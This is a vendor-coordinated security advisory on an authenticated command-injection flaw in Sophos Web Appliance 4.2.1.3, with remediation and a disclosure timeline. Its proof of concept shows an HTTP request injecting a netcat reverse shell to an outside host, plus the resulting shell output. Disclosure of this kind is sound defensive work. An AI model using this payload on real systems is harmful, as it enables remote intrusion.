KL-001-2016-009 : Sophos Web Appliance Remote Code Execution
Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt
1. Vulnerability Details
Affected Vendor: Sophos
Affected Product: Web Apppliance
Affected Version: v4.2.1.3
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements
used in an OS Command ('OS Command Injection'),
CWE-88: Argument Injection or Modification
Impact: Remote Code Execution
Attack vector: HTTP
2. Vulnerability Description
An authenticated user of any privilege can execute arbitrary
system commands as the non-root webserver user.
3. Technical Description
Multiple parameters to the web interface are unsafely handled and
can be used to run operating system commands, such as:
POST /index.php?c=logs HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
Gecko/20100101 Firefox/46.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 305
Connection: close
STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1
HTTP/1.1 200 OK
Date: Tue, 10 May 2016 15:35:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 207
{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10
4:35
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}
--
The vulnerable parameters are: by, request_id, and txt_filter_domain
That request launches the following process on the SWA:
1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
--start='2016/05/10' --end='2016/05/10' --action=''
--sid=590fca17b230e8cdba0394cfa28ef2eb
From the shell launched via netcat:
id;uname -a;uptime
uid=1000(spiderman) gid=1000(spiderman)
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15
4. Mitigation and Remediation Recommendation
The vendor has issued a fix for this vulnerability in Version
4.3 of SWA. Release notes available at:
http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
2016.09.28 - KoreLogic requests status update.
2016.09.28 - Sophos informs KoreLogic that an update including a fix
for this vulnerability will be available near the end
of October.
2016.10.13 - Sophos informs KoreLogic that the update was released to a
limited customer base and is expected to be distributed
at-large over the following week.
2016.11.03 - Public disclosure.
7. Proof of Concept
See 3. Technical Description.
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt